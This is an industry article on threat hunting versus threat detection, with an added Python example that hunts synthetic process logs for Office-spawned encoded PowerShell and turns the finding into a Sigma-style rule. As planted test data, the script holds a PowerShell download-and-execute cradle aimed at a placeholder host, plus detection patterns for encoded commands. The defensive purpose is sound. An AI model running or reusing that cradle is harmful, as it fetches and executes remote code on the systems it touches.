Powered by MOMENTUM MEDIA

How threat hunting can boost your IT security

Organisations should pour more resources into their threat detection capability in an effort to thwart cyber criminals before the damage is done, according to Anthony Daniel from WatchGuard Technologies.

Anthony Daniel
Wed, 09 Feb 2022

Having effective IT security measures in place is vital for organisations of all sizes as the threats posed by cyber criminals continue to increase.

However, stopping these attacks is getting harder as the techniques behind them evolve. According to research firm Gartner, 75 per cent of all successful attacks involve “file-less” or “malware-less” techniques: rather than dropping an executable on disk, the attacker abuses tools that are already present on the system, such as PowerShell, WMI or the scripting hosts, so there is no new file for signature-based scanning to flag. That makes these attacks much more difficult for many traditional security tools to spot.

Indeed, according to a recent M-Trends research report, the average time taken by organisations to detect an IT security breach has blown out to 175 days. That is a long window in which an attacker has access to the target’s IT infrastructure without the knowledge of the security team.


For these reasons, a strategy of constant threat hunting is vital. If attackers are not using malware that can be readily detected and are not exploiting known software vulnerabilities, hunting for the traces they leave behind is essentially the only way they can be found and neutralised.

Threat hunting is about identifying attacks in their early stages, before the attacker has reached their objective. These attacks could be mounted by an external party or by insiders, such as staff members who have become dissatisfied with the organisation and want to cause disruption and loss.

Threat hunting versus threat detection

When developing a comprehensive IT security framework, it’s important to understand the difference between threat detection and threat hunting.

In a threat detection strategy, the IT security team first deploys a range of tools across the infrastructure that are designed to spot threats and report back. The team then triages the resulting alerts and responds to the incidents deemed serious.

A threat hunting strategy is different. Here, the IT security team formulates a hypothesis about the form an attack might take (for example, that an attacker is abusing PowerShell rather than dropping malware) and then looks for evidence of such an attack in the telemetry the infrastructure already produces. If the hypothesis remains unproven, the team formulates another.

If a hypothesis is proven, the scope is expanded and a wider hunt initiated for related activity that is likely to already exist within the infrastructure. Response actions are started, and the findings are turned into new detection mechanisms so that the same activity is spotted automatically in future.
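As a worked illustration of that loop (this is an added example, not code from the article or from WatchGuard), the script below takes one hypothesis from the file-less attacks mentioned earlier, “an Office application spawned PowerShell with an encoded command”, tests it against process-creation events, widens the scope by comparing every parent-to-child pair against a baseline of routine activity, and finally writes the proven hypothesis out as a Sigma-style rule so it becomes a detection rather than a recurring hunt. The events, the baseline counts and the planted malicious command line are all constructed here so the script runs offline; the field names and thresholds are assumptions, not a particular product’s schema.

```python
"""Hypothesis-driven threat hunt over constructed process-creation telemetry.

Added example, not from the article or from WatchGuard. The events, the
baseline and the planted true positive are constructed so this runs offline.
"""
import base64
import json
import re
from collections import Counter

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand, so catch the
# short forms attackers actually type. The captured group is the base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})")


def encode_ps(script: str) -> str:
    """-EncodedCommand takes base64 of the script as UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16le")


# Constructed Sysmon-style process-creation events, reduced to the fields the
# hunt needs. The winword.exe -> powershell.exe event is the planted hit.
MALICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "outlook.exe", "cmd": "outlook.exe"},
    {"host": "ws01", "parent": "outlook.exe", "image": "winword.exe", "cmd": "winword.exe /n invoice.docm"},
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + encode_ps(MALICIOUS_SCRIPT)},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "ws02", "parent": "svchost.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -enc " + encode_ps("Get-Date")},
    {"host": "ws03", "parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
]

# Constructed baseline: how often each parent->child pair was seen in the
# last 30 days of routine activity (the "conventional activity" a hunter knows).
BASELINE = Counter({
    ("explorer.exe", "outlook.exe"): 900,
    ("outlook.exe", "winword.exe"): 400,
    ("explorer.exe", "powershell.exe"): 120,
    ("services.exe", "svchost.exe"): 5000,
})


def hunt_office_spawned_encoded_ps(events):
    """Step 1: test the hypothesis. Office parent -> PowerShell child with -enc."""
    hits = []
    for ev in events:
        if ev["parent"].lower() not in OFFICE_APPS or ev["image"].lower() not in POWERSHELL:
            continue
        m = ENC_FLAG.search(ev["cmd"])
        if not m:
            continue
        try:
            script = decode_ps(m.group(1))  # decode so the analyst sees intent
        except ValueError:  # bad base64 or non-UTF-16 payload
            script = "<undecodable payload>"
        hits.append({"host": ev["host"], "parent": ev["parent"], "script": script})
    return hits


def rare_parent_child_pairs(events, baseline, min_seen=5):
    """Step 2: widen the scope. Flag pairs rare or absent in the baseline,
    which also surfaces the svchost.exe -> powershell.exe event the narrow
    hypothesis ignored."""
    return [ev for ev in events
            if baseline.get((ev["parent"].lower(), ev["image"].lower()), 0) < min_seen]


def to_sigma_rule():
    """Step 3: turn the proven hypothesis into a Sigma-style detection rule."""
    return {
        "title": "Office Application Spawning Encoded PowerShell",
        "status": "experimental",
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {
                "ParentImage|endswith": sorted("\\" + a for a in OFFICE_APPS),
                "Image|endswith": sorted("\\" + p for p in POWERSHELL),
                "CommandLine|re": ENC_FLAG.pattern,
            },
            "condition": "selection",
        },
        "level": "high",
    }


if __name__ == "__main__":
    for h in hunt_office_spawned_encoded_ps(EVENTS):
        print(f"[hit] {h['host']}: {h['parent']} -> powershell, decoded: {h['script']}")
    for ev in rare_parent_child_pairs(EVENTS, BASELINE):
        print(f"[rare pair] {ev['host']}: {ev['parent']} -> {ev['image']}")
    print(json.dumps(to_sigma_rule(), indent=2))
```

The narrow hypothesis returns exactly one hit and decodes the payload so the analyst can see it reaches out to a URL; the baseline comparison is what widens the scope, catching the encoded PowerShell launched from svchost.exe that the first hypothesis was never written to find. Both findings would then be checked against the organisation’s own baseline before the rule is promoted to production.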

It should be remembered that threat hunting is not about waiting for a security alert to be triggered; it is a far more proactive approach. At the same time, it is not a replacement for threat detection but a strategy that is complementary to it. Nor can it be fully automated, so it will always require a level of human involvement.

The key benefit of threat hunting

It has long been held among security teams that keeping an IT infrastructure fully secure is a tough task: the attacker need only find one hole in the defences to gain entry and carry out their plans, while the defender has to cover every hole.

Threat hunting, however, reverses that asymmetry. The attacker now needs to hide every trace of having gained entry and moved around, while the security team needs to find only one trace to detect the intrusion and take steps to neutralise it.

To take advantage of a threat hunting strategy, organisations need IT security professionals with considerable expertise and industry experience. These team members must be very familiar with their organisation’s IT infrastructure and the normal activity that takes place on it, because a hunt is only as good as the baseline it is compared against. Armed with that knowledge, they are in a much better position to spot new threats and take the steps required to prevent them causing disruption.

Alternatively, an organisation can work with an external security vendor that provides access to the required level of expertise. The vendor can assist in developing and testing threat hypotheses to determine what events may have taken place.

A threat hunting strategy can significantly improve the overall security posture of an organisation. Spotting cyber criminals before they can carry out their intended attack can prevent disruption and help to avoid significant financial and reputational losses.

Anthony Daniel is the regional director, Australia, New Zealand and Pacific Islands, at WatchGuard Technologies.
